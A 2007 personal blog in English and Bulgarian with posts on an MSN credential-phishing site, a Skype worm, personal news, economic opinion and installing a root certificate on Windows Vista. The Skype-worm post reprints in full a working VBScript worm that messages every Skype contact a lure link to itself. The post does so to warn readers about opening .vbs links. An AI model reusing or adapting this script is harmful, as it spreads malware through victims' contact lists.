doncho.net

New Hoax: Check Messenger on ScanMessenger

Posted on 9/10/20079/11/2007 by Doncho

Yesterday I was really surprised to get the following message from one of my contacts:

> Check this out to find out if someone deleted you from their MSN: http://www.list-view.com

It obviously did not sound like him, more like an automated message, delivered from a bot. Of course, I did not click directly on the link (later I found that it would not cost any harm, but better safe than sorry). I preferred to copy/paste the link in one of my protected environments and see what will happen there.

The site, which I saw, had quite good, even professional design. However, they were asking __very strange__ question to me: to enter my MSN login data. As a return they promised to reveal me a big secret: to tell me which of my contacts deleted me from their contact lists.

Of course, I never gave them my Microsoft Passport credentials. And I do not advise any of you to give them. They claim that they do not store any personal information, but you can __never__ be sure of this. By giving them your Passport credentials you let them access any of your passport-related services. If you’re paid subscriber, you simply let them access your financial data as well.

To confirm my words I decided to query for “ScanMessenger” the site in Live Search. Obviously, the second found result was McAfee’s Site Advisor for scanmessenger.com. My suspicion was confirmed – Check Messenger / ScanMessenger is nothing more but fragulent site, designed to steal your Passport credentials.

If you spend some time clicking on its links, you will see that behind the shiny facade there’s nothing more but one “login” page. No matter where you click, you will either get “404 Not Found” error, or this login page. However, in order to ensure maximum coverage, they have this page translated into many languages (20 so far).

Will you get any real “service” from this site? Possibly. If you enter your credentials, this site will (at least) get your contact list from MSN, then it will send from your behalf the above message to all the people in your contact list. If the people in your contact list are stupid enough to do the same, the site will “know” that they have not deleted you yet. However, this “service” will fail if the people are smart enough not to give their Microsoft Passport credentials just to everyone, or if they have really deleted you from their contact list :).

What to do if you already visited the place and gave your credentials? I’d say the first thing should be to change your Passport password. Then, depending on which sensitive services you’re subscribed there, I’d advice you to go through all transaction-related data there and check your virtual (and maybe real too, if you have credit card info stored somewhere) money. And hope that all is OK. And learn to never give your credentials again.

Оценка на живота ми

Posted on 9/8/20079/8/2007 by Doncho

Повлиян от Семките и бонбонките, реших и аз да му дръпна един тест:

This Is My Life, Rated
Life:	6.6
Mind:	6.8
Body:	6
Spirit:	4.4
Friends/Family:	6.5
Love:	7.3
Finance:	8.2
Take the Rate My Life Quiz

Резултатите са повече от интересни. Особено финансовите:

> __Your Finance score is very high, much higher than the average__. If you wouldn’t mind, please take a little time to explain how you manage to succeed so well at this aspect of your life. Your words may be read by someone else who scored very low. Take a moment to give them some useful advice. Your thoughts are very much appreciated.

Как да следим лесно новини и блози или какво е RSS

Posted on 9/7/20079/7/2007 by Doncho

Днес попаднах на много интересно, подробно и описателно видео относно това какво е RSS и как той може да се използва за следене на новини, блогове и т.н. сайтове, които генерират ново съдържание от време на време.

Ако някой не знае какво е RSS четец (още казано RSS Reader), да гледа видеото. Разбира се, то е на английски. Но за сметка на това е много добро.

Mighty Mouse

Posted on 9/4/20079/4/2007 by Doncho

Избираме нов ноутбук за :Веси:. Избираме го от доста време, но все още не можем да вземем решение (две Везни, нали знаете как е…). Вариантите са или MacBook, или каквото и да е друго (вероятно Dell или малък таблет HP).

Мак не знам дали ще вземем, но Apple Mighty Mouse вече си имам :). Доста скъпа, но и доста красива.

Функционална тя засега е, както би казал учителя Йода, но явно цялата ѝ красота ще се види само под Маковската ОС, защото под Windows си я разпознава като стандартна bluetooth мишка. А съм чувал, че под Мак има интересни функции – можеш да си я блъскаш отляво/отдясно и тя прави разни номера :).

Нямах търпение да я пусна. Пуснах я и съм много доволен. Trackball-а ми се вижда малко афифен, дано не опираме до гаранция скоро.

Ще пиша после, ако има някакви проблеми. Ако не пиша, значи всичко е ОК.

КАПИТАЛни неудачи напоследък

Posted on 9/1/2007 by Doncho

Преди време имах известни грижи покрай електронния ми абонамент в КАПИТАЛ. Тогава нещата се разрешиха перфектно, просто екипът е железен.

Напоследък обаче съм леко разтревожен. КАПИТАЛ и ДНЕВНИК за мен нямат алтернатива, а това което се случва от известно време насам откък техническото осигуряване на сайта сериозно ме обезпокоява.

Какво всъщност наблюдавам отскоро.

Поглеждайки си кореспонденцията ми прави впечатление, че до сега ми се е налагало да рапортувам проблеми три пъти: февруари, юли и август. Налага ми се и днес, така че вече за статистиката го има и септември. Забелязвате ли повишаването на честотата? Имам чувството, че машината която движи сайта (по-точно техническата ѝ страна) започва все по-често да издиша. Аз определено не съм човек, който да е неграмотен по тази част. И щом на мен ми се налага да пиша за проблеми, обикновено това се оказват истински такива.

Днешния кутзуз накратко:

* Влизам сутринта да си взема новичкия, топъл брой на PDF. Няма по-голям кеф за мен от това да си сваля събота сутрин новия брой, да се изтегна на дивана и да го прочета (е, поне статиите, които представляват “моментален” интерес). Принципно му отделям поне час, и това е най-интензивното време, когато си чета вестника;
* Да, обаче с влизането браузъра ми изплюва някаква абсурдна грешка, която много прилича на гръмване в сървъра на Капитал при опит да ми се сервира страницата. Решавам аз да си изтрия всички куки от Капитал и Дневник, за да дам шанс на сървъра да забрави проблемната сесия и да ми отвори нова.
* Така и правя. Избирам всички куки, изтривам ги (както Капиталните, така и Дневнишките, знам че сървъра като нищо може да е същия).
* Посещавам страницата отново, пробвам логин и получавам грешка, която този (първия) път звучи логично: “Зададеното потребителско име и парола се използват от друг компютър. Опитайте след около половин час”.
* Ядосан зарязвам страницата, кълнейки лошия късмет. Правя нещо друго поне половин час.
* Пробвам пак. “Зададеното потребителско име и парола се използват от друг компютър. Опитайте след около половин час”. Сега вече започвам да усещам дежа-вуто отпреди 3 седмици, когато (пак) имах проблеми с този сайт. Пиша е-поща на стабилен човек от сайта, който задочно познавам;
* Изчаквам поне 40 минути. Пробвам пак. “Зададеното потребителско име и парола се използват от друг компютър. Опитайте след около половин час”. <censored>!@!@beep#!@#beep#!!@#</censored>Вече съм сериозно вбесен и ми е ясно, че и тази събота няма да чета КАПИТАЛ.

Това е. Сега ме е яд даже като пиша тези редове. Яд и страх едновременно, защото дори КАПИТАЛ да не се оправят, за мен няма друга алтернатива. Поне не и електронна, или не съм я открил все още. Ще съм принуден да се съобразявам с всички грешки и проблеми на сайта и да си псувам, защото ако искам да прочета българска преса, която да е “нормална”, просто няма кой друг да чета.

Пиша редовете тук с надежда да стигнат до някой, който може да помогне. За мен всички заредили се един след друг проблеми са индикация, че нещо сериозно куца в техническия екип. Куцането е още по-куцо (извинете каламбура тук), защото на сайта на КАПИТАЛ му липсва 24/7 официална поддръжка. Хората официално си почиват и няма такъв, на който да му е работа да му пука, че някой (който си е и платил!) не може да си прочете вестника навреме. И с удоволствието, което заслужава.

КАПИТАЛци, моля ви, направете нещо. Не се превръщайте постепено в [поредната] българска медия с редовно окуцял сайт. Знам, че правите много нововъведения, знам че няма безгрешни програмисти (това __добре__ го знам, повярвайте!). Не позволявайте на нововъведенията да създават негативни емоции на вашите почитатели. Особено събота сутрин. Защото аз __няма откъде__ да си го купя на хартия.

Stockholm ни зове

Posted on 9/1/20079/1/2007 by Doncho

Решихме към края на октомври да направим 4 дневно пътуване до Стокхолм. :Веси: намери евтини билети през Sterling, осигурихме си и евтин хотел (_не_ през Стърлинг, защото те са скъпари!), и вече имаме всичко резервирано и готово. Остава да дойде 22.10.

От сега точа зъбки за снимки там. Дано улучим хубаво време!

Re: “Защо не живеем по-добре”

Posted on 8/31/2007 by Doncho

Отначало мислех да пиша коментар към статията на г-н Димитров, но след това реших да коментирам тук, а после да сложа връзка към статията в коментарите там.

Да помислим наистина: Защо не живеем по-добре?

Г-н Димитров твърди, че това е заради по-високата от планираната инфлация:

По-високата инфлация означава намаляване на покупателната способност на българските граждани, със същите пари могат да купят по-малко стоки и услуги. Като имаме предвид очакваната висока инфлация се вижда, че дори правителството да увеличи още веднъж пенсиите с 10% от 1 октомври, общото увеличение за цялата година ще бъде около 7%, колкото се очаква да бъде и инфлацията.

Аз ще си позволя да не се съглася с това.

Според статията на г-н Димитров инфлацията до края на годината ще е 7%. Това ли ни дели от по-добрия живот? Тези ли __седем__ процента? Ако средната заплата е 500 лв в момента, в едно работещо семейство доходът би следвало да е 1000 лв. Ако това работещо семейство казва, че не живее добре с тия 1000 лв, значи ли това че то би живяло добре с 1070 лв (1000 лв + инфлацията)?

Ами според мен – не. Ако 1000 лв не стигат да живееш добре, 7% не могат да ти помогнат. И в това г-н Димитров според мен е сгрешил.

Харесва ми обаче как свършва статията:

Икономиката има нужда от мощен тласък за по-бързо развитие. За целта е необходимо въвеждане на плосък данък от 10% със запазване на необлагаемия минимум и намаляване на осигурителната тежест с повече от 6 процентни пункта.

Няма как да не се съглася! Това си беше в платформата на десните партии тогава, когато аз гласувах за тях. Не за партията на г-н Димитров, но те са си виновни, че така разцепиха дясното тогава. Да се надяваме, че са се научили.

Плосък данък ще се въведе от догодина. Вярно, заедно с въвеждането му ще последва и увеличаване на една от най-големите тежести за бизнеса, а именно [здравно/пенсионно] осигурителната такава, понеже МРЗ ще стигне 220 лв. Но не може да очакваме от комунисти логично мислене, нали? Да се надяваме, че промяната въпреки всичко ще е за добро.

Ако обаче се върнем на самото заглавие: “Защо не живеем по-добре”. Според мен има няколко причини за това:

### Масата хора в активна възраст не работят добре.
За да живееш добре, трябва да работиш добре. Ако работиш зле, много вероятно е, че ще живееш зле. Например (и сега ще ме очерните, знам!):

* __Учителите__. Реват за високи заплати. Но искат да работят както до сега. Искат масата от тях да не четат, да разчитат на вехтата си диплома за висше, взета преди 20 години. Дори една учителка по начална математика, ако не чете книги свързани с професията ѝ, само за 5 години ще затъпее и ще се превърне в лелка. Ще се превърне в “даскалка”, която мрази не само професията си, но и децата, на които трябва да дава знания. А дори и да не ги мрази, пак няма да може да им даде знанията, защото тя няма да им е интересна. Децата се променят, ако не следваш промяната им, ще станеш “даскал”. Подходът “повече пари за учителите, които работят истински” е добър, но защо нямам доверие, че ще се прилага справедливо?

* __Лекарите__. Тук по-добре въобще да не почвам! Какви по-високи заплати, какви 5 лева. Според мен те (лекарите, като съсловие) и до сега вземат безумно много пари (вижте здравния ни бюджет като цяло) за услугата, която предлагат в замяна (българското здравеопазване). Да, ще кажете, генерализирам. Може и да генерализирам, но пък познавам лекари, които не вземат никак лоши пари! Едва ли им “стигат” (на кой му стигат парите?), но в никакъв случай не изнемогват. Тези лекари бачкат __яко__! Четат! Интересуват се от новости! Винаги са на ръба на вълната! Тези лекари могат и заслужават парите, които правят.
Познавам обаче и медицински работници (нарочно не казвам “лекар”), които са там за ден да мине, друг да дойде. Разчитат на една заплата и на където дойде подкуп. Не им пука нито за пациентите им, нито за колегите им. Работата няма значение, “шото парити са малку”. Е, такива медицински работници според мен не трябва да вземат повече пари. Напротив – трябва да вземат по-малко. Да идат в Испания (много е популярно да се говори сега как в Испания плащали мноого повече), да видят дали някой там ще ги трае и един месец, ако работят така, както го правят тук. Но не ходят. Защото и те много добре __знаят__, че за нищо не стават, не и по начина, по който работят.

Мога да продължа много този списък. Мога да го продължа с цялата държавна администрация, чак до неучтивата продавачка от съседното ви магазинче, и тя сърдита за заплатата, която ѝ е малко. Ще спра обаче, защото мисля, че усетихте за какво иде реч. За да живеем по-добре, всички ние трябва и да работим по-добре. Да работим, да се борим _самите ние_ с _нашите_ проблеми. Да не чакаме министър или премиер или пък някой блогър-престъпник да ни реши проблемите. Когато видим някой да тараши нечия кола, преди да отминем (даже и преди да се обадим в полицията) поне да се развикаме, да извадим на светло мизерият му. Защото отминавайки я даваме своя принос за това политиците (в случая в лицето на г-н Димитров) да обвиняват инфлацията за това, че не живеем добре.

> > Искам да отбележа, че дълбоко уважавам усилията, които десните хвърлят, за да предотвратят все по-дълбоката дупка, в която сегашното управление се опитва да ни закопава. Заедно с това уважавам и стремежът политик да бъде и блогер. Това е едно от нещата, които ни доближават до нормалните държави.

Българско SKYPE червейче

Posted on 8/31/20078/31/2007 by Doncho

Вчера :Веси: получи интересно съобщение на шльокавица от една от нейните приятелки в СКАЙП:

> Искам да ти призная , че те обичам много … Просто ме беше срам да ти го кажа преди това (blush) Поздравче за теб миличко : http://lоfffkаmtе.hit.bg/mоqsnimkа.vbs :*
>
> _връзката умишлено е сгрешена тук, за да не кликне някой четящ по погрешка на нея, иначе в SKYPE си беше наред_

При кликване на връзката се отваря стандартен прозорец, който подканя потребителя за “Open” или “Save”. Очаквайки снимка, повечето наивни потребители ще кликнат на Open, след което я получат, я не още едно съобщение и като резултат на машинката им ще се изпълни следната зловредна програма:

on error resume next set NrrlP = WScript.CreateObject("Scripting.FileSystemObject") set uDlVA = wscript.createobject("wscript.shell") set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_") yADAl.Client.Start() yADAl.Attach() For Each GAG In yADAl.Friends yADAl.SendMessage GAG.handle,"Искам да ти призная , че те обичам много ... Просто ме беше срам да ти го кажа преди това (blush) Поздравче за теб миличко : http://lofffkamte.hit.bg/moqsnimka.vbs :* " next msgbox "bY GENCHO411 ( http://galaxy.forumi.bg )"

Хубаво е, че бях около Веси, когато тя получи съобщението. 99% съм сигурен, че и тя щеше да се върже. Не че в конкретния случай щеше да се случи нещо по-сериозно (освен шеговито обяснение в любов на нея към всичките ѝ контакти, заедно с връзчица към “снимката” ѝ). Но тази програмка лесно може да се преправи така, че да нанесе сериозна вреда на машината ѝ.

Практически, когато всеки от нас не гледа какво стартира (особено ако е получено от “приятелски” контакт), той рискува данните си, а заедно с това и парите си (възможно е да му вземат всички пароли от IE/firefox например), че и като нищо и сигурността си (адреси и т.н.). Може да ви се струва малко параноично, но ако искате да сте сигурни, че само вие разполагате с компютъра и с данните си, трябва __всеки__ път, когато получите каквато и да е връзка по който и да е чат клиент, да поглеждате разширението ѝ.

Разширението (в случая – vbs) е това, което показва какво точно компютърът ви ще направи с данните, които ще източи от външния сайт. В този конкретен случай VBS е нищо повече освен Visual Basic Script. А това си е програмен език, т.е. оторизирайки (чрез “Open”) изпълнението му вие практически казвате “Направи каквото искаш с този компютър и с данните в него”. Никаква антивирусна, firewall или друга защита в случая няма да ви спаси. Много малко червеи от този вид се разпознават от антивирусните програми – най-вече поради факта, че лесно се променят и всеки злосторник може да го стори. И ако злосторника зариби ваш приятел, и ако вие не обърнете внимание на разширението, лесно може да станете и вие жертва. И след това ще се почнат едни приказки за това кое е по-сигурно и кое не е.

Накратко:

* Гледайте _внимателно_ разширението на всяка връзка, която изпълнявате във вашия компютър. Ако е JPG/BMP/PNG/PCX в повечето случаи сте ОК. Ще пропусна възможността компютърът ви да не е защитен с последните поправки на Windows. Ако това е така, дори отваряне на някой от тези файлове може да нанесе сериозни щети на вас и данните ви. Ако не може да познаете разширението, по-добре не отваряйте връзката. Ако пък много искате да я отворите, попитайте някой професионалист за помощ.

* По принцип работете с не-администраторски привилегии. За жалост, в 99% от компютрите, за които знам (преди Windows Vista) потребителската сметка с която се работи има пълни, администраторски привилегии, което значи че ако злосторник проникне по който и да е начин, може да постави “на колене” цялата система. За това как се работи с не-администраторски привилегии може да пиша някой друг път, ако не ме примързи.

Като цяло съм бил свидетел не на един случай, в който ние обвиняваме операционната система за това, че имаме вирус, червей или spyware. Факт е, че Windows е най-разпространената OS, и като такава е и най-атакуваната. Необразования потребител (а 90% от потребителите са необразовани) обикновено не знаят въобще как да се предпазят, а като стане белята е много по-удобно (и по-човешко :)) да обвиним някой/нещо друго, нали?

Надявам се чатещите непрофита да прочетат това и да го запомнят. Питайте, ако имате въпроси. Защото след това става късно :).

БСОД

Posted on 8/26/20078/26/2007 by Doncho

От Blink.nu:

Това определено е измама, но е добре измислена :). BSOD хич не е приложение и хич няма да поиска от UAC разрешение да се покаже. Но идеята е повече от ценна.

Иначе се прибрахме, живи, здрави и уморени от дългата ваканция. Днес сутринта Веси сподели: “Тук съм като на почивка”. Аз обаче не мога да кажа същото.

Смятам да пробвам Archlord. Поканите за нея ми валят след бетата, но не ми се даваше и €1. Сега обаче е безплатна, да видим какво са натъкмили. Тя хич не е нова, просто ми е любопитна дали са “казали” нещо ново в нея…

Инсталиране на trusted root сертификат във Windows Vista

Posted on 8/22/2007 by Doncho

Една от многото задачи в България беше да регистрирам персонален електронен подпис на мен и :Веси:. Няколко обменени е-пощи с хора от InfoNotary ме убедиха, че мога да разчитам на тази компания (не че имах избор, но се чувствах вече много по-спокоен).

След като купихме сертификатите, по странна причина инсталацията на моя компютър не успя. За това обвинявам основно мен, защото инсталирах през мрежово CD, а не през локалното такова, както беше указано в инструкциите. Като резултат от провалената инсталация, при :Веси: нещата работеха добре, но при мен всичко беше мазало.

Нямах време, чакаше ме почивка, така че оставих нещата да отлежат, разчитайки че след 3 седмици ще се оправят с помощ от съпорта.

Като се прибрах, още първия ден имах работеща инсталация. С няколко думи и уточнения (за което много благодаря на специалистите от InfoNotary) всичко си тръгна, с изключение на едно – по някаква причина основния (root) сертификат на InfoNotary не искаше да се инсталира в моят Trusted Root Certificates склада на моят компютър. Лошо, защото това директно означаваше, че няма как системата да “вярва”, че моят подпис е автентичен.

InfoNotary ми обещаха помощ, но нали сърце юнашко не трае, реших да запретна ръкави сам. В крайна сметка, това е Windows, затова и приех нещата леко лично :).

Първо реших да ровя из публичното пространство. Бях оставил фирменото настрана, но разчитах солидно и на него, ако публичния Internet ме предаде. Разбира се, не се наложи да ползвам други ресурси. Farhan Ahmad (един от многото MVP) е обяснил прекрасно процедурата как да инсталираме сертификат като trusted такъв в цял материал в неговия сайт.

Накратко (и на български):

* Нужен ви е административен режим. Или пускате IE като администратор, или използвате Certificate Manager-а, който така или иначе ще ви поиска административен режим при стартиране
* Различното при Vista е, че трябва __изрично__ да му укажете сертификатът да попадне на локалния компютър. Ако не го направите, процесът вероятно ще се провали:
* Когато дойде ред да указвате складът, където сертификата да се запише, изберете “ръчно” и Browse.
* От новия прозорец изберете “Show physical stores”, след което намерете Trusted Root Certificates и изберете Local Computer. След това ОК.
* Би следвало да виждате вече избран не просто Trusted Root Certificates, а Trusted Root Certificates\Local Computer.
* От там насетне следвайте нормалната процедура.

Всичко е описано детайлно в статията на Фархан, мен ме мързи да пиша повече. Ако имате въпроси – знаете как да ме намерите. Ако не знаете, използвайте коментарите.